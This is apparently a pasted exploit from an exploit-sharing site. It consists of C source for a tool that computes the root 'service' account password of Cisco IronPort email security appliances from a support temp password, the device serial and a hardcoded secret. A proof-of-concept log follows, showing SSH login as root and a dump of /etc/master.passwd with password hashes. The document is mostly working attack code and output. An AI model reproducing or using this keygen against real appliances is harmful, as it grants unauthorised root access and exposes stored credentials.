
Cisco Exploit

a guest
Apr 14th, 2018
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <ctype.h>
  5. #include "md5.h"
  6. #include "getopt.h"
  7.  
  8. #define MAX_BUFFER 128  /* size in bytes of the buffer main() assembles the hash input in */
  9. #define SECRET_PASS "woofwoof"  /* fixed constant main() appends after the password and serial before hashing */
  10.  
  11. void usage(char *name);  /* prints the help text and exits with status 0 */
  12. void to_lower(char *str);  /* lowercases ASCII 'A'..'Z' in place */
  13. void fuzz_string(char *str);  /* in-place substitutions: '1' to 'i', '0' to 'o', '_' to '-' */
  14.  
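  /*
   * Command-line entry point.  Takes a temporary password (-p) and a serial
   * number (-s), normalises both in place (fuzz_string on the password,
   * to_lower on the serial), concatenates password + serial + SECRET_PASS,
   * hashes the result with MD5 and prints the first four digest bytes as
   * eight lowercase hex digits.
   *
   * Security note for readers assessing the scheme: every input to the hash
   * is either supplied on the command line or is the SECRET_PASS constant,
   * so the printed value is fully determined by them, and only 32 bits of
   * the digest are kept.
   *
   * Returns 0 on success and EXIT_FAILURE when the inputs do not fit in the
   * working buffer.  Missing or surplus arguments go through usage(), which
   * exits with status 0.
   */
  int main(int argc, char *argv[]) {
      /* Number of leading MD5 bytes that are printed (was sizeof(digest)-12). */
      enum { PASSWORD_BYTES = 4 };

      const char *secret_pass = SECRET_PASS;
      char *temp_pass = NULL;
      char *serial_no = NULL;
      char service[MAX_BUFFER] = { 0 };
      unsigned char digest[16] = { 0 };
      int opt;

      if (argc < 2) {
          usage(argv[0]);  /* does not return */
      }

      while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
          switch (opt) {
          case 'p':
              temp_pass = optarg;
              break;
          case 's':
              serial_no = optarg;
              break;
          case 'h':
              usage(argv[0]);
              break;
          default:
              /* Kept as in the original: argv[1] is echoed, which is not
               * necessarily the option getopt rejected. */
              printf_s("Wrong Argument: %s\n", argv[1]);
              break;
          }
      }

      /* A leftover positional argument or a missing -p / -s is a usage
       * error; the original expressed the first test as a loop that ran at
       * most once. */
      if (optind < argc || temp_pass == NULL || serial_no == NULL) {
          usage(argv[0]);
          return 0;
      }

      /*
       * The three strings are concatenated into service[], so the SUM of
       * their lengths plus the terminating NUL has to fit.  The original
       * only compared each length with sizeof(service) on its own and left
       * the overflow case to the strcpy_s/strcat_s runtime-constraint
       * handler.  The subtractions are ordered so they cannot wrap.
       */
      {
          const size_t room = sizeof(service) - 1;
          const size_t secret_len = strlen(secret_pass);
          const size_t pass_len = strlen(temp_pass);
          const size_t serial_len = strlen(serial_no);

          if (secret_len > room ||
              pass_len > room - secret_len ||
              serial_len > room - secret_len - pass_len) {
              fprintf(stderr,
                      "Input too long: password and serial together must not exceed %lu characters\n",
                      (unsigned long)(secret_len > room ? 0 : room - secret_len));
              return EXIT_FAILURE;
          }
      }

      /* Both helpers rewrite the argv strings in place. */
      to_lower(serial_no);
      fuzz_string(temp_pass);

      strcpy_s(service, sizeof(service), temp_pass);
      strcat_s(service, sizeof(service), serial_no);
      strcat_s(service, sizeof(service), secret_pass);

      MD5_CTX context;
      MD5_Init(&context);
      MD5_Update(&context, service, strlen(service));
      MD5_Final(digest, &context);

      printf_s("Service Password: ");
      for (size_t i = 0; i < PASSWORD_BYTES; i++) {
          printf("%02x", digest[i]);
      }

      return 0;
  }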
  69.  
  /*
   * Walk the NUL-terminated string and substitute three characters in
   * place: '1' becomes 'i', '0' becomes 'o' and '_' becomes '-'.  Every
   * other character is left untouched.
   */
  void fuzz_string(char *str) {
      for (char *cursor = str; *cursor != '\0'; ++cursor) {
          if (*cursor == '1') {
              *cursor = 'i';
          } else if (*cursor == '0') {
              *cursor = 'o';
          } else if (*cursor == '_') {
              *cursor = '-';
          }
      }
  }
  80.  
  /*
   * Lowercase the ASCII letters 'A'..'Z' of a NUL-terminated string in
   * place.  Bytes outside that range are not modified; no locale is
   * consulted.
   */
  void to_lower(char *str) {
      for (; *str != '\0'; ++str) {
          const char ch = *str;
          if ('A' <= ch && ch <= 'Z') {
              /* 'a' - 'A' is the 0x20 offset between the two ASCII cases */
              *str = (char)(ch + ('a' - 'A'));
          }
      }
  }
  89.  
  /*
   * Print the command-line help, using `name` as the program name in the
   * synopsis and the example, then terminate the process with status 0.
   * This function does not return.
   */
  void usage(char *name) {
      /* Fixed option descriptions, printed in this order. */
      static const char *const option_help[] = {
          " -p <password> | Cisco Service Temp Password\n",
          " -s <serial> | Cisco Serial Number\n",
          " -h | This Help Menu\n",
      };
      size_t i;

      printf_s("\nUsage: %s -p password -s serial\n", name);
      for (i = 0; i < sizeof option_help / sizeof option_help[0]; i++) {
          printf_s("%s", option_help[i]);
      }
      printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
      exit(0);
  }
  98.  
  99.  
  100.  
  101. /* PoC:
  102.  
  103. Enable Service Account
  104. ----------------------
  105. root@kali:~# ssh -lenablediag 192.168.0.158
  106. Password:
  107. Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
  108. Copyright (c) 2001-2013, Cisco Systems, Inc.
  109.  
  110.  
  111. AsyncOS 8.5.5 for Cisco C100V build 280
  112.  
  113. Welcome to the Cisco C100V Email Security Virtual Appliance
  114.  
  115. Available Commands:
  116. help -- View this text.
  117. quit -- Log out.
  118. service -- Enable or disable access to the service system.
  119. network -- Perform emergency configuration of the diagnostic network interface.
  120. clearnet -- Resets configuration of the diagnostic network interface.
  121. ssh -- Configure emergency SSH daemon on the diagnostic network interface.
  122. clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
  123. tunnel -- Start up tech support tunnel to IronPort.
  124. print -- Print status of the diagnostic network interface.
  125. reboot -- Reboot the appliance.
  126.  
  127. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
  128. Service Access currently disabled.
  129. ironport.example.com> service
  130.  
  131. Service Access is currently disabled. Enabling this system will allow an
  132. IronPort Customer Support representative to remotely access your system
  133. to assist you in solving your technical issues. Are you sure you want
  134. to do this? [Y/N]> Y
  135.  
  136. Enter a temporary password for customer support to use. This password may
  137. not be the same as your admin password. This password will not be able
  138. to be used to directly access your system.
  139. []> cisco123
  140.  
  141. Service access has been ENABLED. Please provide your temporary password
  142. to your IronPort Customer Support representative.
  143.  
  144. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
  145. Service Access currently ENABLED (0 current service logins)
  146. ironport.example.com>
  147.  
  148.  
  149. Generate Service Account Password
  150. ---------------------------------
  151. Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
  152.  
  153. Usage: woofwoof.exe -p password -s serial
  154. -p <password> | Cisco Service Temp Password
  155. -s <serial> | Cisco Serial Number
  156. -h | This Help Menu
  157.  
  158. Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
  159.  
  160. Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
  161. F508A4
  162. Service Password: b213c9a4
  163.  
  164.  
  165. Login to the appliance as Service account with root privileges
  166. --------------------------------------------------------------
  167. root@kali:~# ssh -lservice 192.168.0.158
  168. Password:
  169. Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
  170. Copyright (c) 2001-2013, Cisco Systems, Inc.
  171.  
  172.  
  173. AsyncOS 8.5.5 for Cisco C100V build 280
  174.  
  175. Welcome to the Cisco C100V Email Security Virtual Appliance
  176. # uname -a
  177. FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014
  178. auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
  179.  
  180. # cat /etc/master.passwd
  181. # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
  182. root:*:0:0::0:0:Mr &:/root:/sbin/nologin
  183. service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
  184. enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access
  185. control:/root:/data/bin/enablediag.sh
  186. adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password
  187. Tool:/data/home/admin:/data/bin/adminpassword.sh
  188. daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
  189. operator:*:2:5::0:0:System &:/:/sbin/nologin
  190. bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
  191. tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
  192. kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
  193. man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
  194. sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
  195. nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
  196. support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
  197. admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
  198. clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
  199. smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
  200. spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
  201. pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
  202. ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
  203.  
  204. */
  205.  
  206. #  0day.today [2018-04-14]  #